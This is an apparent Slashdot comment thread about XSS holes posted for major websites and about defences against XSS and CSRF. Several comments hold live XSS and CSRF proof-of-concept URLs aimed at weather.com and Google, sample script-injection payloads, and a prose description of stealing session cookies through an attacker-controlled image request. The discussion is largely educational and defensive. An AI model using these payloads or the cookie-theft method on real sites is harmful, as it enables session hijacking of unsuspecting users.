Cross-Site Scripting Hits Major Sites

An anonymous reader writes "Dark Reading and SC Magazine covered a story about hackers posting cross-site scripting (XSS) vulnerabilies en mass on dozens of high profile websites including Dell, MSN, HP, Apple, Myspace, YouTube, MSN, Cingular, etc. The media coverage drew the hacker's attention to the publication's websites where they got a taste first-hand. On message board wall-of-shame is PC World, MacWorld, Fox News, the Independent, and ZDNet UK. "...not only did we get the "scoop" on the XSS site problems, but we also got the message loud and clear: Don't assume you're immune to XSS vulnerabilities. They're everywhere." The news comes shortly after Mitre (CVE) released statistics showing XSS has become the most popular exploit. Unfortunately new XSS attacks are growing increasingly severe and scanners are unable to find many of the issues on modern websites."

The Cross Site Scripting FAQ

[mrkitty]

The Cross Site Scripting FAQ

Re:The Cross Site Scripting FAQ

[Dwonis]

I particularly like this example.

Here's the spoiler.

Re:The Cross Site Scripting FAQ

Leet turn this positive.

What can be done by the visitor to a site to prevent cross site scripting from being exploited?

FUD is unproductive Please tell us what we can do.

Re:The Cross Site Scripting FAQ

[PowerKe]

Maybe if you disable cookies Google always uses English (probably based on your IP/location).

The url is simply a redirect (HTTP/1.0 302) to http://www.google.com/setprefs?hl=ga&submit2=Save% 20Preferences%20&prev=http://www.google.com/search ?q=poodles&q=&submit=Save%20Preferences%20 so it should work regardless of the browser or OS.

Re:The Cross Site Scripting FAQ

Thanks that explains it then nobody gets to put a cookie on my machine unless I absolutely need to have it and I certainly don't need a 30+ year cookie to just to search with Google. So that begs the question what if anything can this foolishness do to a Linux machine?

Re:The Cross Site Scripting FAQ

[russ1337]

I use No Script a firefox plugin. Not sure if this protects against this kind of thing (anyone?). No-script lets me chose who's scripts are run by domain and I see plenty of sites trying to run in-browser scripts from third party domains. I leave all scripts off unless something doesnt work then I just allow the primary domain - if I trust it.

Can any web Guru's tell me if No-Script protects against what is outlined in the OP?

Re:The Cross Site Scripting FAQ

[blowdart]

No it doesn't. Cross site scripting works by adding a script tag to the source page. For example, imagine you have allowed scripts from slashdot because you can't use the new comments system without it.

Now an evil hax0r manages to insert an XSS attack on slashdot what would happen is the attack would be embedded in a normal slashdot page, as a block. So the source would be from slashdot.org, and noscript would view it as being allowed.

Re:The Cross Site Scripting FAQ

[russ1337]

Appreciate your reply. I'll be uber careful and not allow any scripting at all. Perhaps I'll switch to Lynx. Of course I'll have to be carefull not to get jailed for using it!

Re:The Cross Site Scripting FAQ

[Schraegstrichpunkt]

Look closer. This particular vulnerability doesn't use any special JavaScript or anything else; It's a simple redirect. The only way to fix it would be for Google to change something (such as by adding a referer check) in its preferences module, or for you to special-case this particular attack in your browser.

Re:The Cross Site Scripting FAQ

[blowdart]

I was talking generically; anyway the redirect is not an XSS attack at all.

Re:The Cross Site Scripting FAQ

[074322]

XSS or CSS..people might confuse CSS with Cascading Style Sheets (CSS)...

Re:The Cross Site Scripting FAQ

[Matt+Perry]

Cross site scripting works by adding a script tag to the source page. For example, imagine you have allowed scripts from slashdot because you can't use the new comments system without it. Now an evil hax0r manages to insert an XSS attack on slashdot what would happen is the attack would be embedded in a normal slashdot page, as a block. So the source would be from slashdot.org, and noscript would view it as being allowed.

You are missing the point. Think of NoScript as a firewall. Instead of accepting JavaScript from anyone you can deny by default and only run JavaScript from those sites that you have approved. Yes, you could still be vulnerable if you have JavaScript enabled for Slashdot and someone does like you say. However, there are still billions of other web sites that have JavaScript that your browser will refuse to execute. That reduces the chance of an attack succeeding significantly. Better safe than sorry, as the saying goes.

Re:The Cross Site Scripting FAQ

[Schraegstrichpunkt]

Oops. Never mind. I thought you replied to a different post.

Re:The Cross Site Scripting FAQ

[blowdart]

But it really doesn't. The whole "idea" being XSS is to get it to act in the context of a trusted site, to take session cookies, hijack browsers, install spyware whatever. NoScript would stop a bare minimum of badly implemented XSS which loads a .js file from an external domain to the attacked site.

Re:The Cross Site Scripting FAQ

[uss_valiant]

Look closer. This particular vulnerability doesn't use any special JavaScript or anything else; It's a simple redirect. The only way to fix it would be for Google to change something (such as by adding a referer check) in its preferences module, or for you to special-case this particular attack in your browser.

Referer checks are not robust enough.
Converting the controller to accept POST only (no GET) or adding a signature / nonce to the form would fix it.

Re:The Cross Site Scripting FAQ

That's not XSS at all. It's called CSRF.

Re:The Cross Site Scripting FAQ

[Heembo]

You can undo the language setting set by the link from this idiot above at http://www.google.com/preferences?hl=en

Re:The Cross Site Scripting FAQ

[Dwonis]

If you'd followed the second link I posted, you would have found a similar solution.

-- Your friend, "this idiot".

Re:The Cross Site Scripting FAQ

[Dwonis]

Yeah, I realize that now. I've updated the page accordingly.

Re:The Cross Site Scripting FAQ

[Heembo]

Dearest Idiot, You only posted one link in this thread, and it was malicious. http://slashdot.org/comments.pl?sid=197523&thresho ld=-1&commentsort=0&mode=thread&cid=16185807 Heembo

Re:The Cross Site Scripting FAQ

[Schraegstrichpunkt]

Referer checks are not robust enough.

Why wouldn't a referer check be enough?

Converting the controller to accept POST only (no GET) or adding a signature / nonce to the form would fix it.

It would have to be a nonce, and probably one that's tied to a particular user, and can't be generated by third parties for that user. Otherwise, I can just copy the form to my website, modify it, and use some Javascript to auto-submit it.

Re:The Cross Site Scripting FAQ

[Matt+Perry]

But it really doesn't. The whole "idea" being XSS is to get it to act in the context of a trusted site, to take session cookies, hijack browsers, install spyware whatever.

I'm afraid I might not fully understand the nature of XSS and how it works. I've read the FAQ linked to in the original comment of this thread. I've also read the Wikipedia entry on XSS. It seems that in all instances some form of browser-based scripting is required to execute the payload. Let's forget NoScript for a moment and assume that I've disabled JavaScript in my browser. If JavaScript is disabled can I still be vulnerable to a XSS attack and if so, how?

Re:The Cross Site Scripting FAQ

[blowdart]

No. Scripting must always be enabled for XSS attacks to work. The key thing to remember is that the scripts will be running in the context of the loaded page. So an XSS attack that happens on slashdot will appear to be script on slashdot. Things like noscript don't help that much, because you will be trusting the site normally, especially the new ajax based ones.

Now you may think scripting isn't that bad, if you're using Firefox, after all it can't install spyware. But what it can do is lift cookies, and from there you can hijack a session. In the address bar type javascript:alert(document.cookie); and hit return. If scripts are enabled for the page you will see a bunch of stuff. Now consider that I can load an image with javascript which resides on a server I can control. I can also add parameters to the request, appending the cookie. So we get the entire cookie for your current session on that site. I can then handcraft a cookie to match the one I have just stolen and lo, depending on the site, I am now you.

Re:The Cross Site Scripting FAQ

That idiot is not your idiot.

Re:The Cross Site Scripting FAQ

[epee1221]

This idiot actually posted two links.

Re:The Cross Site Scripting FAQ

[Heembo]

This Idiot just got self slammed! wah!!!!!!

Re:The Cross Site Scripting FAQ

[Matt+Perry]

Cool. Thanks for clarifying that for me.

Re:The Cross Site Scripting FAQ

[uss_valiant]

Because the Referer can be suppressed and some users do that actively, e.g. in Opera, it's an easy option.
You can't count on it.

@nonce: Of course. I just sketched the normal approach to securing sites from Cross Site Request Forgery.

Scripting?

document.write("It's very hard to check for XSS. I can understand why most people don't bother.")

Re:Scripting?

That won't work....The javascript has an error....Try this...

<script language="javascript">document.write("It's very hard to check for XSS. I can understand why most people don't bother.");</script>

Now back to hiding under my desk.....

Re:Scripting?

[loquacious+d]

Actually, JavaScript doesn't need semicolons. You only have to use them if you inline more than one line's worth of JS, so grandparent is correct.

Finally

[suso]

You know, I've been waiting for this feature on weather.com

Re:Finally

Enjoy http://www.weather.com/search/enhanced?whatprefs=& what=WeatherLocalUndeclared&lswe=%3Cscript%3Ealert ('Its+raining')%3C%2Fscript%3E&lswa=WeatherLocalUn declared&from=whatwhere&where=%3Cscript%3Ealert('I ts+raining')%3C%2Fscript%3E&x=0&y=0

Scanners not able to find XSS

[possible]

The reason most vuln scanners can't find XSS vulns on modern sites is because of the increased amount of JavaScript and Flash (with ActionScript) that's in use. But some scanners can grok this stuff to varying degrees of completeness.

Re:Scanners not able to find XSS

[Tackhead]

> The reason most vuln scanners can't find XSS vulns on modern sites is because of the increased amount of JavaScript and Flash (with ActionScript) that's in use.

Which is why I'm so happy that the currently-in-demonstration phase of the new Slashdot discussion system presumes/requires that Javascript be active.

Re:Scanners not able to find XSS

Javascript is the number one problem with scanning sites today, of all the products we evaulted http://www.ntobjectives.com/products/ntospider.php came out on top.

Problem was, it was kind of expensive.

I don't get XSS

[RevDobbs]

I'm sorry, I really don't grok Cross-Site Scripting issues...

Are there really that many web "programmers" out there that don't check their user-supplied inputs? I mean, that shit is CS 101...

Re:I don't get XSS

[truthsearch]

Actually, CS 101 is data types and algorithms. Earning my CS degree taught me little of input validation. Most programmers learn security in one of two ways: proactively reading up on it or having one of their applications hacked. Unfortunately I think many average programmers don't consider input validation as much of a priority until after a hole they provided is exploited. When I ask many web developers what they do to prevent SQL injection attacks, for example, only about half have even considered it. Scary.

Re:I don't get XSS

I've taught programming on and off for about 30 years at one of the best schools in the country, and I have never heard anyone even mention checking user input for something malicious. I have never seen it in a text book. This sort of thing isn't addressed by Knuth. It never comes up since in the recent past all development was done for trusted users. For example, you wouldn't care if a user on an isolated computer running Microsoft Word attempted an exploit. You don't need to check user input when teaching algorithms.

That simply isn't CS 101. It isn't CS anything. It's only covered if you have a low-level web development class at a pitiful tech school.

Re:I don't get XSS

[Yvanhoe]

That's it. They allow users in forum to post links, and URL. URL can have a lot of strange characters in it, & ? ! # etc... Apparently, the basis of XSS is to make a link that appears like a valid URL but that will, in some clients, execute as a javascript code, usually in order to steal cookies (therefore, an opened session) of the user watching the post. There seems to be a shield vs sword thing growing between attackers and web developers. You have numerous ways of "hiding" a code in an URL, hexadecimal notation, strange utf-8 characters and so on. Here again, an incomplete implementation of a standard is the cause of major headaches.

Re:I don't get XSS

[RevDobbs]

Earning my CS degree taught me little of input validation.

Maybe I lucked out with a particularly cluefull teacher, but input validation was beaten into me learning Basic on an Apple II(e?) in high school: everyone fails the first round of the Craps game assignment when the teacher asks "what happens when I bet a negative amount?".

Re:I don't get XSS

[chrismcdirty]

What about when the management at a company doesn't want their Word user to escalate their privileges to SYSTEM level? I'll admit, I've only had one teacher tell me to check inputs for malicious content, and that was in a security class. But I have had it beaten into my head to check for valid input any time you gather input, as to not break your program. Starting from there, it is easily extended while checking valid input to also check for valid input that will not break your system in some fashion.

Re:I don't get XSS

[daviddennis]

There is a tension between what users want to do that's legitimate, and what users can do maliciously.

For example, I'm developing a myspace-like system, with which I am presently grappling with these issues.

Ideally, I'd like to give users perfect creative freedom to do whatever they want on their profiles and online community pages. After all, they should be able to express themselves, no?

So before these attacks became well-known, it was a perfectly reasonable stance to say that we should NOT filter user input, that we should let people express themselves as they want. That's been my position, before I learned about this problem.

Before you laugh, even computing greats have made similar mistakes. RMS, of Emacs, GNU and GPL fame, used to rail against people using passwords on their accounts. He had no password on his account on the MIT AI ITS machine, which was accessible through the ARPANet. Theoretically, a lot of bad things could have happened to him, but they didn't because yesterday's ARPANet users had respect for him and people like him. The administrators eventually forced him, pretty much at gunpoint, to set a password. Of course he told everyone what it was. Such was the wonderful culture of the AI lab.

I don't know what RMS has done personally, but I'm sure he has a password on his account now, and I'm sure that fact greatly saddens him. I am sad about it myself. I don't like this new world of poison users and XSS and spyware and so on, but unfortunately you have to accept it as a fact of life.

My own tipping point, which showed me how important this issue was, was this fellow. I actually like him, or at least his writing style. But what he did to myspace makes my blood run cold. I realized after that that I simply could not allow people to do whatever they wanted.

Another important thing to note is that preventing XSS is not as simple as it seems. In fact, preventing it may be just plain impossible if we don't want to prevent people from doing things like showing videos and Flash, with the OBJECT tag. There are apparently huge security holes in allowing it, but if you don't, then you have a world without music or video. If anyone has tips on securing this, please reply to this and let us all know. I was thinking that it might be necessary to allow only certain URLs but that seems too draconian if there's any way to avoid it.

If we disregard that particular risk, it's still very difficult to prevent JavaScript from sneaking in. This site, unfortunatley Slashdotted together with the article, is an excellent example of how hard it is to deal with these problems, and how subtle and persistent the enemy is.

Anyway, I've spent two solid days figuring out ways to deal with all the exploits Rsnake deals with in the above document. I'm about done now, and I'm confident that my system will stand tall against most known attacks. But there's always something around the corner, and I guess that's what makes being a security guy interesting.

Personally, I really resent the time I have to waste on restricting people's freedoms just because this is a cruel and crazy world out there of people who wish you ill, just because you happen to design systems. I love to design systems, and this new project is the best thing I've ever worked on, but I shake my head over what this world has become.

And then I go back to work.

D

Re:I don't get XSS

[CastrTroy]

You've said it. I've found that school teaches very little about programming in the real world. Sure you get some security courses, adn they are great, but I think there should be a class on the common problems that show up in programming. Things that should really be taugh are:

1. Always use parameterized queries and never construct your own queries by concatenating strings. This will not only speed up the application, it will make sql injection attacks a non-issue
2. Always verity the users input. You never know what the user is going to try to do with bad input.
3. When programming in languages like C, always check to ensure that the user can't perform a buffer overflow attack.

I'm sure there's a lot of other things that people could add to this list. There's a lot of mistakes that happen over and over again. And I don't think that it's because people don't care, or aren't smart enough, but simply because they don't know the problem exists.

Re:I don't get XSS

[Schraegstrichpunkt]

Before you laugh, even computing greats have made similar mistakes. RMS, of Emacs, GNU and GPL fame, used to rail against people using passwords on their accounts. He had no password on his account on the MIT AI ITS machine, which was accessible through the ARPANet. Theoretically, a lot of bad things could have happened to him, but they didn't because yesterday's ARPANet users had respect for him and people like him.

In other words, it wasn't a mistake; He just had a better understanding of the threat than you did, apparently.

Re:I don't get XSS

[Schraegstrichpunkt]

Another important thing to note is that preventing XSS is not as simple as it seems. In fact, preventing it may be just plain impossible if we don't want to prevent people from doing things like showing videos and Flash, with the OBJECT tag. There are apparently huge security holes in allowing it, but if you don't, then you have a world without music or video. If anyone has tips on securing this, please reply to this and let us all know. I was thinking that it might be necessary to allow only certain URLs but that seems too draconian if there's any way to avoid it.

I haven't tried this, but how about registering a separate domain for that content, and using an IFRAME (or whatever works) to bring in the media? Don't put any privileged scripts on that domain.

Re:I don't get XSS

I've taught programming on and off for about 30 years at one of the best schools in the country, and I have never heard anyone even mention checking user input for something malicious. I have never seen it in a text book. This sort of thing isn't addressed by Knuth. It never comes up since in the recent past all development was done for trusted users. For example, you wouldn't care if a user on an isolated computer running Microsoft Word attempted an exploit. You don't need to check user input when teaching algorithms.

That simply isn't CS 101. It isn't CS anything. It's only covered if you have a low-level web development class at a pitiful tech school.
 
Best.... Troll... Evah!

Re:I don't get XSS

[daviddennis]

Oh, I had the same understanding as him, at the time. I didn't use a password either.

I think my basic point stands, that we have to be much more paranoid now than we did then, and that on a personal level I think it really stinks.

D

Re:I don't get XSS

[daviddennis]

Good thinking, and I thank you for raising the idea. But it won't work in my case.

As you know, at this very moment, YouTube is going bust in bandwidth bills hosting all that video, unless someone buys them out for US$1.5 billion first.

I don't want to host video. I want to let people point to their videos whereever they might be, so your idea won't work.

D

Re:I don't get XSS

[pushf+popf]

Actually, CS 101 is data types and algorithms. Earning my CS degree taught me little of input validation. Most programmers learn security in one of two ways: proactively reading up on it or having one of their applications hacked. Unfortunately I think many average programmers don't consider input validation as much of a priority until after a hole they provided is exploited. When I ask many web developers what they do to prevent SQL injection attacks, for example, only about half have even considered it. Scary.

AFAIK, Input Validation isn't taught in school, but neither are any of the other thousand things a programmer need in order to be a productive employee.

Things like real-life data conversion techniques between incompatible systems with relationally inconsistant data, building applications using missing and contradictory requirements, knowing when to keep your mouth shut in a meeting, knowing that every problem isn't ideal for your preferred tool, and all the rest.

FWIW, I'd reject all CS applicants that hadn't already learned a very substantial amount on their own, before ever thinking about college.

Re:I don't get XSS

[DRAGONWEEZEL]

Where did you go to school?
Input Validation is the very 1st & last thing that was taught in my CS program.
Hell, I went to publick skewl and I got that....

Your absolutley right though, not enough people prioritize it.

Re:I don't get XSS

[operagost]

I don't know what RMS has done personally, but I'm sure he has a password on his account now, and I'm sure that fact greatly saddens him. I am sad about it myself. I don't like this new world of poison users and XSS and spyware and so on, but unfortunately you have to accept it as a fact of life.

I lock my house and car. I don't like this new world of robbers and thieves, but unfortunately you have to accept it as a fact of life.

Re:I don't get XSS

[Jerf]

Apparently, the basis of XSS is to make a link that appears like a valid URL but that will, in some clients, execute as a javascript code

No, that's just one way to do it. XSS is any insertion of Javascript code into a site that shouldn't be there, and there are a surprising number of ways to do that. <a href="javascript:alert('hi!')">text</a> is just one of the easier ones.

I say this because people need to be aware that links are not the only vector. My favorite one I've seen so far is <bgsound src='javascript:bad_code()'>. If you choose poorly and are trying to filter out bad tags (instead of what you should be doing, specifying only exactly what tags and attributes are allowed and forbidding anything else that looks like a tag), did you remember to block out the BGSOUND tag? If not, that auto-executes; it doesn't even need to be clicked. (IE may have closed that; I saw this in the IE 4 era.)

Re:I don't get XSS

[Schraegstrichpunkt]

Eh? Do the same thing then, but instead of hosting the video, just stick the OBJECT tags on the unprivileged domain.

Re:I don't get XSS

[jimp79]

From TFA: CTO for White Hat Security Jeremiah Grossman says the companies' whose sites are posted on the message board should immediately fix the XSS vulnerabilities and check their logs to be sure nothing got in. Cross-site Scripting is an attack against the clients not the server. There is no way XSS can be used to compromise the web server. I would expect more from the CTO of White Hat.

Re:I don't get XSS

[cubicledrone]

I've found that school teaches very little about programming in the real world.

Let's shut them all down, huh? Why do we continue to bullshit ourselves about education? We value education about as much as we value crotch fungus.

Re:I don't get XSS

[Tiger4]

Sir, are you suggesting that I cannot trust my users to provide valid input into a program THEY asked to run? That is the most preposterous thing I've ever heard! Next thing, you'll be saying they'll just try to run their own programs, on MY machines. Maybe even try to get system privs and run as SU. No way! Thats crazy talk.

Re:I don't get XSS

[TheAJofOZ]

The problem isn't that they didn't validate the user input, so much as that validating user input is really, really hard. RSS aggregators are discovering the problems with validating that HTML is safe. See http://www.feedparser.org/docs/html-sanitization.h tml
The trouble is that an approach like that limits what you can do too much: http://www.symphonious.net/2006/09/10/stripping-st yles-as-part-of-sanitation/
Any site that wants to support formatted comments, like Slashdot, has to deal with this. The plus side when it's just comments is that you can have very draconian limitations to what's accepted without it getting in the way (like Slashdot does).

Re:I don't get XSS

[Bugs42]

Actually, CS 101 is data types and algorithms. Earning my CS degree taught me little of input validation.

Funnily enough, in my first CS course in college (COMP 110) the professor made sure we did input validation. Yes, the focus of the course was algorithms, but since most of the assignments involved input he had us implement some simple checking and validation.

Re:I don't get XSS

[DrSkwid]

Anyone who says they are a "web developer" is going to be vulnerable to plenty of vectors.

Why?

No web developer has written XSS vulnerable code since 2002. What we have is total morons passing themselves off as web developers, just like we have thousands of "web designers" who don't know the meaning of the word "design".

For most contracts, if you aren't paying experienced developers, there should still be money in the budget for a pro to give the code the once over and do a sign-off.

Re:Why?

[RevDobbs]

For most contracts, if you aren't paying experienced developers, there should still be money in the budget for a pro to give the code the once over and do a sign-off.

Have you ever read poorly-written, newbish code?

For anything non-trivial, it would probably be quicker and cheaper to have the "pro" write the code in the first place than to pay him for his time to read, understand, and correct a steaming pile of turd spaghetti.

Re:Why?

[mcfuddlerucker]

Not to mention the liability. I know I wouldn't ever "sign-off" on something I didn't know inside and out. Which pretty much means I have to have written it, or maintained it for a lengthy period of time.

Re:Why?

[w00f]

Yes - of course! But then our execs couldn't claim that it was done 'cheaper off-shore'... right?

Re:Why?

For anything non-trivial, it would probably be quicker and cheaper to have the "pro" write the code in the first place than to pay him for his time to read, understand, and correct a steaming pile of turd spaghetti.

Exactly! You can bet site operators believe they are using experienced developers and I'll wager the contractors aren't charging "newbish" prices.

Re:Why?

[Schraegstrichpunkt]

What we have is total morons passing themselves off as web developers, just like we have thousands of "web designers" who don't know the meaning of the word "design".

"Web design" is for aesthetics and graphics people, like "interior design". Of course you run into problems when you have a web designer doing development work!

As for "No web developer has written XSS vulnerable code since 2002", I refer you to The Daily WTF.

Re:Why?

[suggsjc]

I agree. However, this was talking about high-profile sites that are affected. *Hopfully* sites like that doesn't have "steaming pile of turd spaghetti" making it run.

I do think that most any code especially high-profile code that has the potential to affect personal data (of large numbers of usres) should be reviewed by "pros" and third-party's. I want the largest number of eyes to review my code, and someone wanting a review shouldn't be taken as not "trusting" or whatever...it just makes sense.

Re:Why?

[msuzio]

Um, you did see MySpace is on the list, right?

That site is the biggest turd ever foisted on this earth since the mammoth stopped taking dumps in Siberia.

Re:Why?

How about:

        No competent developer has released XSS vulnerable code into production for many years?

Why:

        Smoke tests!

We all make mistakes and I'm not sure every MSIE parsing bug should be classed as pure XSS. While a bad test suite can be as bad as no tests at all, there's a mitigating factor here; any web coder should know about coding for the web (XSS) before they start charging money for their services.

Re:Why?

[Schraegstrichpunkt]

Yeah, you can't expect anyone competent to "sign off" on code you've written (though I imagine that there are plenty of incompetent people who are willing to do it). What you can do is ask them to break your code, as long as you agree to terms that state that "the fact that I can't break it does not imply that someone else won't be able to".

Move on...

[955301]

So would it be technically possible at this point to move away from the web application and back to the client server app? Here's a path example:

* Java Client
* Servlet Interface for the client
* Java webstart deployment
* Java plugin on the clients

For this path the questions would surround authenticating the client and the hassle of installing the java plugin.

Rinse and repeat for the obligatory Microsoft solution.

I've never been a fan of web applications and form given the simplicity of creating an SQL injection attack or XSS for that matter. At least if the client application was built for the specific application you expose yourself to less or more obscure security vulnerabilities by nature.

Re:Move on...

[CommandNotFound]

Not just possible, but it works and has been shipping for a while by Canoo.

Re:Move on...

[dwarfking]

First off let me preface by agreeing with you that a slightly thicker client model makes sense over the web application model.

That said, however, I don't think that will necessarily solve the problem. Most HTML form based code is already being intercepted by Java servlets and processed by Java, meaning the developers are taking the form fields and dumping them straight into SQL (for SQL injection issues). So moving to a different client isn't going to change that problem, the fields will just be captured in a different way.

Now, if the new client had higher levels of field validation built in (intelligent input widgets that blocked most strange characters unless specifically directed to allow them), that would help.

Re:Move on...

[a.d.trick]

You can do that but it won't solve the problem. The problem is that input from their users isn't validated properly. There just taking it and using it as raw code. It can happen in a web page, or an applet, or even other kinds of software. I would argue that a web page is actually considerably more secure because the attack is limited to things that that website can access (unless it exploits a browser bug). The solution is fewer idiot programers running around on the web and more code review and such.

Re:Move on...

[profplump]

A) It's just as simple to prevent an SQL injection attack. Failing to clean your input is just a stupid mistake, regardless of the input method. Mistakes happen, but let's not pretend that input validation is complicated.

B) The reason people like to build web interfaces is that the client, server, and transfer mechanism already exist. Writing a new one for each project is much, much more work.

Re:Move on...

[955301]

Is it really? I mean, don't we all reuse some part of our previous projects? Even if it's just a basic framework such as Hivemind, or a favorite logging facility or just plain experience. Those things apply in the client server world too. And frankly, mocking up and implementing a swing application is not difficult. Heck, it was built for all the things AJAX is toted as the solution to.

Re:Move on...

[955301]

I disagree, but not directly. The medium you use to build an app affects how you can divide your time out across development. Mucking around with html and browser nuances deplete your effort in other typically last minutes areas such as adequate field validation. All else being equal, if you use a medium intended for applications and not just html you're likely to have more time to sanity check your work.

And seeing as the idiot programmers are multiplying... ;)

Re:Move on...

[profplump]

If the client-server code gets re-used in every new app, how is that different from using a web browser with respect the context of the obscurity that the parent suggested could be provided with other solutions? Any sufficiently re-used bit of code loses its obscurity by means of its popularity.

Moreover, it's still more work to maintain your own client-server app than to use the browsers and HTTP servers that are available for free on every popular operating system. Even if you assume $0 in maintenance, you at least have to write the thing in the first place.

Re:Move on...

This is like saying....

So, would it be possible to remove clients from the network and go back to stand alone PC's?
I've never been a fan of the networks and from given the simplicity of creating viruses, trojans and malware.

C'mon man, blame the suck-ass programmers, not the technology!!

In soviet russia..

[djuuss]

.. XSS links YouTube

scanners

[rilian4]

...and scanners are unable to find many of the issues on modern websites

Obviously the hackers can find systems with this vulnerability...ergo there exists a means to scan for it...

Draw you own conclusions from there...

Re:scanners

[From+A+Far+Away+Land]

"Draw you own conclusions from there..."

You're using logic, while security software marketers are using damage control.

Re:scanners

Draw you own conclusions from there... which one? that humans can do stuff that computers can't?

But of course Slashdot...

[Billosaur]

...remains unaffec... FOJSF{09fiE*EU90av['vlwIOA934MAwadpskf[aepfkfa[-09 u9a

Re:But of course Slashdot...

[_xeno_]

A while ago, someone posted a link to a webpage that, when clicked, caused their post to be moderated up. Their post was at +5 for quite a while until enough replies got moderated up pointing out that the link wasn't what it claimed to be.

So, in a sense, Slashdot has already been hit by a cross-site scripting vulnerability. The fix for XSS vulnerabilities like that involves requiring a secret token to be sent to take user actions, to prevent people from creating forms off-site and submitting them as the user. I suppose checking the referrer may work too, but I wouldn't count on it.

Re: But of course Slashdot...

[klenwell]

Tokens probably solve some of these problem. And something like this doesn't hurt:

http://cyberai.com/inputfilter/index.php

Re:But of course Slashdot...

That's called CSRF, something entirely different:

http://shiflett.org/articles/security-corner-dec20 04

Re:But of course Slashdot...

[finiteSet]

A while ago, someone posted a link to a webpage that, when clicked, caused their post to be moderated up.

Do you have a link to support this claim?

Re:But of course Slashdot...

[ArtStone]

Anyone else been getting "unfair moderation" notification messages for moderations they didn't do?

Web 2.0 anyone?

[griffon666]

Web 1.0: Simple fishing scam
Web 2.0: Cross-Site Scripting

Re:Web 2.0 anyone?

[blowdart]

It's not really a 2.0 problem (assuming you were being a little serious and not just going for +5 funny). Any web site that accepts user input should be checking, and that includes your company's brochure-ware site, slashdot's new (awful) reading interface, digg.com or bbc.co.uk.

What I do find worrying is that when I talk about this (and I do now and again, because I am a presenting whore) is that some people who are implementing ajax suddenly think because they're getting xml from an environment they set up they don't need to check. "Oh but the user can't write his own javascript and submit any calls" is something I hear very often.

Re:Web 2.0 anyone?

[koehn]

Actually, not true for AJAX, if well-implemented.

I've been working with JsOrb (which lets you call your Java interfaces from Javascript) and one of the nice things about it is that when used correctly it makes XSS vulnerabilities go away. Since the data is encoded inside XML messages, the browser takes care of properly escaping all those goofy characters into & for you.

Re:Web 2.0 anyone?

[blowdart]

Bad assumption. If you're assuming everything is coming down correctly encoded you're a fool, all it takes is a bit of javascript that submits to your back end without encoding and *bang*

Re:Web 2.0 anyone?

[koehn]

That's my point. I don't need to assume that everything is coming down correctly. The browser will encode the data for me. If the XML that comes down from the appserver is invalid, then it's not a valid document and won't parse, so my code fails. If a user submitted text that is JavaScript, the browser escapes the characters for me, and the user sees the text.

I'd be a fool if I received HTML fragments from the appserver, and those fragments were partially user-generated content, and those were unescaped. But I'm not doing that. I'm also not a fool.

Re:Web 2.0 anyone?

[Gareth+Williams]

the browser escapes the characters for me

Oh dear, oh dear, oh dear. No. Bad.
I'm almost inclined to think you're trolling, but I'll give you the benefit of the doubt :-/

You're trusting the browser. You're assuming the user uses their browser in the way you yourself do (by typing stuff into the pretty boxes it gives you). You're assuming that the browser behaves as expected.

What if the browser were to make a minor mistake, and not escape one or more of those characters that you're trusting it to escape. Not likely you say? That'd be an unlucky bug in the browser, right? Well... I have the source code to my browser sitting right here... I'm sure it can be arranged :P

Rule #1: Never trust any data coming from the client machine. Ever.
Treat anything transmitted from the client machine as if it were nuclear waste. Parse every last byte of it that reaches your server, and escape/censor as required.

Re:Web 2.0 anyone?

[koehn]

You're entirely missing the point. My application doesn't trust any data coming in from the browser. That's why I don't inline any data from the browser directly into HTML. I do careful checks of length, type, semantics, authorization, entitlement, etc on every property of every object in every graph that's passed to the application server. But one thing I don't need to worry about is somebody sending up text with a tag (or anything else) inside a string. Any text given is stored as text, and is rendered by the text rendering part of the browser, not the HTML renderer. Not ever. I've thoroughly tested the marshaller, and every single escape is handled correctly. Even if some idiotic browser out there didn't handle escapes correctly, it wouldn't be able to parse the XML stream coming back from the application server, and wouldn't pass a unit test. Not that I'm responsible for bugs in some idiotic browser, but even IE handles it correctly.

It seems you think I was saying that I blindly take whatever XML comes into my application and act on it. I'm not; that would be bad. I would assume that anyone who's written a distributed application has already figured that one out. I'm saying that by not inlining user's text into my HTML, I've prevented a whole class of attacks that apparently (by the article) many web developers don't understand.

While I'm on my soapbox, let me expand the conversation a bit into how poorly designed many single sign-on systems are. The client I'm working with has a typical SSO system in place using SiteMinder. Users log in once, and they're authenticated to every application they can access. They never need to log in again. If ANY application to which they have access has an XSS attack waged against it, EVERY application is compromised, since the users identity is known only through a couple of SiteMinder cookies. The sad part is, almost every application in the company is vulnerable. I checked.

So even though I've been a good steward of painstakingly checking all my end-user inputs, my application can easily be compromised by this boneheaded architecture. Yippee!

Re:Web 2.0 anyone?

[Gareth+Williams]

Whoops. You're right, I did miss your point - my apologies. Too early in the morning, not enough coffee, & all that :) I retract my previous comment.

I thought we were discussing the browser sending data to the server... now I see you were in fact talking about the exact opposite situation (the server sending data to the browser). Indeed you're right, having the browser render the data you give it as text instead of markup is a Very Good Thing if said data might include arbitrary user input :)

It does sound like an elegant way to handle the XSS problem :) Of course it won't be useful in all situations, and you better be careful if you're doing anything else with that user input on your server besides just spitting it back to the browser... but I like it. Seperation of pure data from control information is the best defence we have against XSS and SQL injection.

Have a nice day.

Cheers,
Gareth

JavaScript/browser design flaw

[oohshiny]

Before web designers blame themselves for this, the existence of XSS is really a fundamental design flaw in the way JavaScript and browsers work. It should have been obvious as soon as JavaScript came out that these kinds of attacks would become a major issue over time, but the "ooh shiny" attitude of the computer industry meant that people adopted JavaScript without knowing what the implications were. In fact, the other big security hole and productivity drain of the industry, C/C++, got adopted in a similar way.

Writing any substantial piece of software in C, C++, or JavaScript without creating safety or security issues is extremely expensive and beyond the ability or resources of most developers. For C and C++, there are alternatives you can choose today. For JavaScript, you just have to minimize its use or simply not worry about it and let the client fix it with tools like NoScript.

Re:JavaScript/browser design flaw

[a.d.trick]

No, it actually is the web designers fault (not that I'm any better than they are). The way that browsers work is based on the assumption that the website won't willing screw itself. By not validation user input and just dumping that junk out as markup, the website is making a big mistake. These are issues with *server-side code* not javascript or browsers.

Re:JavaScript/browser design flaw

XSS is not the fault of the web application developer any more than the it is the fault of the user (why do they have js enabled?). Checking for all the crap that IE accepts is almost impossible.

The "fault" is that javascript was not designed with a security model, web developers are just the poor saps stuck trying to deal with others mistakes.

Re:JavaScript/browser design flaw

[julesh]

The point is, though, that browser developers could have made script filtering substantially easier. If you want to accept HTML-formatted input to a web application, you have little choice but to try to filter out any scripts a malicious user may have inserted. And doing so is hard, because there are so many different ways scripts can be inserted into HTML. Script tags, event handler attributes, any attribute that can take a URL (e.g. src, href in many different elements), style attributes, style tags, ...

